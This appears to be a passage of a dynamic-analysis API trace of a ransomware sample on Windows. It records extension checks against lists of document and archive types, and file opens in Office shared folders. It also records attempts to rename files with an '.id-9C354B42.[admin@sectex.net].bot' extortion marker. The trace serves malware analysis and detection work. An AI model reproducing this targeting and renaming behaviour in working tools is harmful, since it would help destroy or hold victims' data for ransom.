	[0138.045] lstrlenW (lpString=".7z") returned 3
	[0138.045] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1
	[0138.045] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0138.045] lstrlenW (lpString=".dbf") returned 4
	[0138.045] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1
	[0138.045] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0138.045] lstrlenW (lpString=".1cd") returned 4
	[0138.045] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1
	[0138.045] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0138.045] lstrlenW (lpString=".jpg") returned 4
	[0138.045] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1
	[0138.045] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0138.045] lstrlenW (lpString="InkWatson.exe.mui") returned 17
	[0138.045] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0138.755] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=9216) returned 1
	[0138.756] CloseHandle (hObject=0x38c) returned 1
	[0138.756] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui")) returned 0x20
	[0138.756] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.756] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74
	[0138.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74
	[0138.756] lstrlenW (lpString=".doc") returned 4
	[0138.756] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0138.756] lstrlenW (lpString=".docx") returned 5
	[0138.756] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0138.756] lstrlenW (lpString=".pdf") returned 4
	[0138.756] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0138.756] lstrlenW (lpString=".xls") returned 4
	[0138.756] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0138.756] lstrlenW (lpString=".xlsx") returned 5
	[0138.756] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0138.756] lstrlenW (lpString=".ppt") returned 4
	[0138.756] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0138.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74
	[0138.756] lstrlenW (lpString=".zip") returned 4
	[0138.756] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0138.756] lstrlenW (lpString=".rar") returned 4
	[0138.756] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0138.756] lstrlenW (lpString=".bz2") returned 4
	[0138.756] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0138.757] lstrlenW (lpString=".7z") returned 3
	[0138.757] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0138.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74
	[0138.757] lstrlenW (lpString=".dbf") returned 4
	[0138.757] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0138.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74
	[0138.757] lstrlenW (lpString=".1cd") returned 4
	[0138.757] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0138.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74
	[0138.757] lstrlenW (lpString=".jpg") returned 4
	[0138.757] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0138.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74
	[0138.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74
	[0138.757] lstrlenW (lpString=".doc") returned 4
	[0138.757] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0138.757] lstrlenW (lpString=".docx") returned 5
	[0138.757] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0138.757] lstrlenW (lpString=".pdf") returned 4
	[0138.757] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0138.757] lstrlenW (lpString=".xls") returned 4
	[0138.757] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0138.757] lstrlenW (lpString=".xlsx") returned 5
	[0138.757] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0138.757] lstrlenW (lpString=".ppt") returned 4
	[0138.757] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0138.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74
	[0138.757] lstrlenW (lpString=".zip") returned 4
	[0138.757] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0138.757] lstrlenW (lpString=".rar") returned 4
	[0138.757] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0138.757] lstrlenW (lpString=".bz2") returned 4
	[0138.758] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0138.758] lstrlenW (lpString=".7z") returned 3
	[0138.758] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0138.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74
	[0138.758] lstrlenW (lpString=".dbf") returned 4
	[0138.758] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0138.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74
	[0138.758] lstrlenW (lpString=".1cd") returned 4
	[0138.758] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0138.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74
	[0138.758] lstrlenW (lpString=".jpg") returned 4
	[0138.758] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0138.758] lstrcmpiW (lpString1=".exe", lpString2=".bot") returned 1
	[0138.758] lstrlenW (lpString="ODeploy.exe") returned 11
	[0138.758] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\odeploy.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0138.851] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=571320) returned 1
	[0138.851] CloseHandle (hObject=0x38c) returned 1
	[0138.851] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\odeploy.exe")) returned 0x20
	[0138.851] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\odeploy.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.851] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\odeploy.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 91
	[0138.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 91
	[0138.852] lstrlenW (lpString=".doc") returned 4
	[0138.852] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0138.852] lstrlenW (lpString=".docx") returned 5
	[0138.852] lstrcmpiW (lpString1=".docx", lpString2="y.exe") returned -1
	[0138.852] lstrlenW (lpString=".pdf") returned 4
	[0138.852] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0138.852] lstrlenW (lpString=".xls") returned 4
	[0138.852] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0138.852] lstrlenW (lpString=".xlsx") returned 5
	[0138.852] lstrcmpiW (lpString1=".xlsx", lpString2="y.exe") returned -1
	[0138.852] lstrlenW (lpString=".ppt") returned 4
	[0138.852] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0138.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 91
	[0138.852] lstrlenW (lpString=".zip") returned 4
	[0138.852] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0138.852] lstrlenW (lpString=".rar") returned 4
	[0138.852] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0138.852] lstrlenW (lpString=".bz2") returned 4
	[0138.852] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0138.852] lstrlenW (lpString=".7z") returned 3
	[0138.852] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0138.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 91
	[0138.852] lstrlenW (lpString=".dbf") returned 4
	[0138.852] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0138.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 91
	[0138.852] lstrlenW (lpString=".1cd") returned 4
	[0138.852] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0138.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 91
	[0138.852] lstrlenW (lpString=".jpg") returned 4
	[0138.852] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0138.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 91
	[0138.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 91
	[0138.853] lstrlenW (lpString=".doc") returned 4
	[0138.853] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0138.853] lstrlenW (lpString=".docx") returned 5
	[0138.853] lstrcmpiW (lpString1=".docx", lpString2="y.exe") returned -1
	[0138.853] lstrlenW (lpString=".pdf") returned 4
	[0138.853] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0138.853] lstrlenW (lpString=".xls") returned 4
	[0138.853] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0138.853] lstrlenW (lpString=".xlsx") returned 5
	[0138.853] lstrcmpiW (lpString1=".xlsx", lpString2="y.exe") returned -1
	[0138.853] lstrlenW (lpString=".ppt") returned 4
	[0138.853] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0138.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 91
	[0138.853] lstrlenW (lpString=".zip") returned 4
	[0138.853] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0138.853] lstrlenW (lpString=".rar") returned 4
	[0138.853] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0138.853] lstrlenW (lpString=".bz2") returned 4
	[0138.853] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0138.853] lstrlenW (lpString=".7z") returned 3
	[0138.853] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0138.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 91
	[0138.853] lstrlenW (lpString=".dbf") returned 4
	[0138.853] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0138.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 91
	[0138.853] lstrlenW (lpString=".1cd") returned 4
	[0138.853] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0138.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 91
	[0138.853] lstrlenW (lpString=".jpg") returned 4
	[0138.853] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0138.853] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0138.854] lstrlenW (lpString="OSETUP.DLL") returned 10
	[0138.854] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390
	[0138.907] GetFileSizeEx (in: hFile=0x390, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=7379816) returned 1
	[0138.907] CloseHandle (hObject=0x390) returned 1
	[0138.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll")) returned 0x20
	[0138.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.907] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0138.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90
	[0138.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90
	[0138.909] lstrlenW (lpString=".doc") returned 4
	[0138.909] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0138.909] lstrlenW (lpString=".docx") returned 5
	[0138.909] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1
	[0138.909] lstrlenW (lpString=".pdf") returned 4
	[0138.909] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0138.909] lstrlenW (lpString=".xls") returned 4
	[0138.909] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0138.909] lstrlenW (lpString=".xlsx") returned 5
	[0138.909] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1
	[0138.909] lstrlenW (lpString=".ppt") returned 4
	[0138.909] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0138.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90
	[0138.909] lstrlenW (lpString=".zip") returned 4
	[0138.909] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0138.909] lstrlenW (lpString=".rar") returned 4
	[0138.909] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0138.909] lstrlenW (lpString=".bz2") returned 4
	[0138.909] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0138.909] lstrlenW (lpString=".7z") returned 3
	[0138.909] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0138.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90
	[0138.909] lstrlenW (lpString=".dbf") returned 4
	[0138.909] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0138.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90
	[0138.910] lstrlenW (lpString=".1cd") returned 4
	[0138.910] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0138.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90
	[0138.910] lstrlenW (lpString=".jpg") returned 4
	[0138.910] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0138.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90
	[0138.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90
	[0138.910] lstrlenW (lpString=".doc") returned 4
	[0138.910] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0138.910] lstrlenW (lpString=".docx") returned 5
	[0138.910] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1
	[0138.910] lstrlenW (lpString=".pdf") returned 4
	[0138.910] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0138.910] lstrlenW (lpString=".xls") returned 4
	[0138.910] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0138.910] lstrlenW (lpString=".xlsx") returned 5
	[0138.910] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1
	[0138.910] lstrlenW (lpString=".ppt") returned 4
	[0138.910] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0138.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90
	[0138.910] lstrlenW (lpString=".zip") returned 4
	[0138.910] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0138.910] lstrlenW (lpString=".rar") returned 4
	[0138.911] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0138.911] lstrlenW (lpString=".bz2") returned 4
	[0138.911] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0138.911] lstrlenW (lpString=".7z") returned 3
	[0138.911] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0138.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90
	[0138.911] lstrlenW (lpString=".dbf") returned 4
	[0138.911] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0138.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90
	[0138.911] lstrlenW (lpString=".1cd") returned 4
	[0138.911] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0138.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90
	[0138.911] lstrlenW (lpString=".jpg") returned 4
	[0138.911] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0138.911] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0138.911] lstrlenW (lpString="OSetupPS.dll") returned 12
	[0138.911] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetupps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0139.027] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=47520) returned 1
	[0139.027] CloseHandle (hObject=0x388) returned 1
	[0139.027] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetupps.dll")) returned 0x20
	[0139.027] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetupps.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.028] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetupps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0139.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 92
	[0139.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 92
	[0139.028] lstrlenW (lpString=".doc") returned 4
	[0139.028] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0139.028] lstrlenW (lpString=".docx") returned 5
	[0139.028] lstrcmpiW (lpString1=".docx", lpString2="S.dll") returned -1
	[0139.028] lstrlenW (lpString=".pdf") returned 4
	[0139.028] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0139.028] lstrlenW (lpString=".xls") returned 4
	[0139.028] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0139.028] lstrlenW (lpString=".xlsx") returned 5
	[0139.028] lstrcmpiW (lpString1=".xlsx", lpString2="S.dll") returned -1
	[0139.028] lstrlenW (lpString=".ppt") returned 4
	[0139.028] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0139.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 92
	[0139.028] lstrlenW (lpString=".zip") returned 4
	[0139.028] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0139.028] lstrlenW (lpString=".rar") returned 4
	[0139.028] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0139.028] lstrlenW (lpString=".bz2") returned 4
	[0139.028] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0139.028] lstrlenW (lpString=".7z") returned 3
	[0139.028] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0139.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 92
	[0139.028] lstrlenW (lpString=".dbf") returned 4
	[0139.028] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0139.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 92
	[0139.028] lstrlenW (lpString=".1cd") returned 4
	[0139.028] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0139.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 92
	[0139.029] lstrlenW (lpString=".jpg") returned 4
	[0139.029] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0139.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 92
	[0139.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 92
	[0139.029] lstrlenW (lpString=".doc") returned 4
	[0139.029] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0139.029] lstrlenW (lpString=".docx") returned 5
	[0139.029] lstrcmpiW (lpString1=".docx", lpString2="S.dll") returned -1
	[0139.029] lstrlenW (lpString=".pdf") returned 4
	[0139.029] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0139.029] lstrlenW (lpString=".xls") returned 4
	[0139.029] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0139.029] lstrlenW (lpString=".xlsx") returned 5
	[0139.029] lstrcmpiW (lpString1=".xlsx", lpString2="S.dll") returned -1
	[0139.029] lstrlenW (lpString=".ppt") returned 4
	[0139.029] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0139.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 92
	[0139.029] lstrlenW (lpString=".zip") returned 4
	[0139.029] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0139.029] lstrlenW (lpString=".rar") returned 4
	[0139.029] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0139.029] lstrlenW (lpString=".bz2") returned 4
	[0139.029] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0139.029] lstrlenW (lpString=".7z") returned 3
	[0139.029] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0139.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 92
	[0139.029] lstrlenW (lpString=".dbf") returned 4
	[0139.029] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0139.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 92
	[0139.029] lstrlenW (lpString=".1cd") returned 4
	[0139.029] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0139.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 92
	[0139.030] lstrlenW (lpString=".jpg") returned 4
	[0139.030] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0139.030] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0139.030] lstrlenW (lpString="pidgenx.dll") returned 11
	[0139.030] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
